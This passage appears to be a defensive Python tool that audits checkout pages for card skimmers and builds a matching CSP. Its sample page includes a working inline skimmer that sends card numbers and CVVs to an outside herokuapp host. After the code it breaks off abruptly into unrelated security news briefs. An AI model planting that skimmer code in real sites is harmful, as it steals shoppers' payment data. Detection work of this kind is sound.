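_EXFIL_CALLS = re.compile(r"XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=", re.I)
_URLS = re.compile(r"https?://[^\s'\"<>]+")


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:            # inside an inline <script>; may arrive in chunks
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def script_host(src, page_host=PAGE_HOST):
    """Host a script src loads from; relative paths load from the page itself."""
    return (urlparse(src).hostname or page_host).lower()


def audit_checkout_page(html, allowed=ALLOWED_SCRIPT_HOSTS, page_host=PAGE_HOST):
    """Return (kind, detail) findings: unknown script origins and inline skimmer patterns."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = script_host(src, page_host)
        if host not in allowed:
            findings.append(("unexpected-script-origin", host))
    for body in parser.inline:
        hosts = {h for h in ((urlparse(u).hostname or "").lower() for u in _URLS.findall(body)) if h}
        foreign = hosts - allowed
        if foreign and _CARD_FIELDS.search(body) and _EXFIL_CALLS.search(body):
            findings.append(("inline-skimmer-pattern", ",".join(sorted(foreign))))
    return findings


def csp_for(allowed, page_host=PAGE_HOST):
    """Content-Security-Policy value enforcing the same allowlist: blocks the injected
    script and the Image()-based exfiltration.  Extend img-src for any image CDN, and
    give legitimate inline handlers a nonce or hash, since 'self' does not cover them."""
    hosts = " ".join(sorted(h for h in allowed if h != page_host))
    return ("default-src 'self'; script-src 'self' %s; connect-src 'self' %s; "
            "img-src 'self' %s; form-action 'self'" % (hosts, hosts, hosts))


# Constructed checkout page: the third <script> tag and the inline handler are the injection.
SAMPLE_PAGE = """<html><body>
<script src="/static/checkout.js"></script>
<script src="https://cdn.shop.example/lib/forms.js"></script>
<script src="https://sleepy-forest-1234.herokuapp.com/js/analytics.js"></script>
<form id="checkout"><input id="cardnumber"><input id="cvv"></form>
<script>
document.getElementById('checkout').addEventListener('submit', function () {
  var d = {card: document.getElementById('cardnumber').value,
           cvv: document.getElementById('cvv').value};
  new Image().src = 'https://sleepy-forest-1234.herokuapp.com/collect?d=' + btoa(JSON.stringify(d));
});
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_PAGE):
        print(kind, detail)
    print(csp_for(ALLOWED_SCRIPT_HOSTS))
```

Run against a fetched copy of the live checkout page on a schedule, the audit catches the case the page describes (a new script origin appearing on a free PaaS subdomain); the CSP catches the same thing in every customer's browser, and its violation reports are the earliest signal a merchant usually gets that a skimmer has been injected.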
NEC has concluded a global cybersecurity agreement with the International Criminal Police Organization (INTERPOL). This partnership replaces an existing agreement by combining INTERPOL's international network with NEC cybersecurity technology to "assist the investigation and analysis of complex and sophisticated cybercrime" in addition to "strengthening security at an international level."
The TICK (also known as BRONZE BUTLER and REDBALDKNIGHT) threat group has stepped up its malware development and deployment since November 2018. TICK, which has been active since 2008, has been developing new malware families capable of evading detection during initial intrusion, as well as escalating to administrative privileges for subsequent attacks and data collection. The group uses legitimate email accounts and credentials to deliver the malware, zeroing in on industries that handle highly classified information: defense, aerospace, chemical, and satellite companies with head offices in Japan and subsidiaries in China. Trend Micro calls this campaign "Operation ENDTRADE"; further details are available in a white paper published by the vendor.
The Cybersecurity and Infrastructure Security Agency (CISA) is aware of a phone scam where a caller pretends to be a CISA representative. The scammer claims to have knowledge of the potential victim's questionable behavior and attempts to extort money. CISA advises anyone who receives such a call not to pay any money and to contact a local FBI field office to file a report.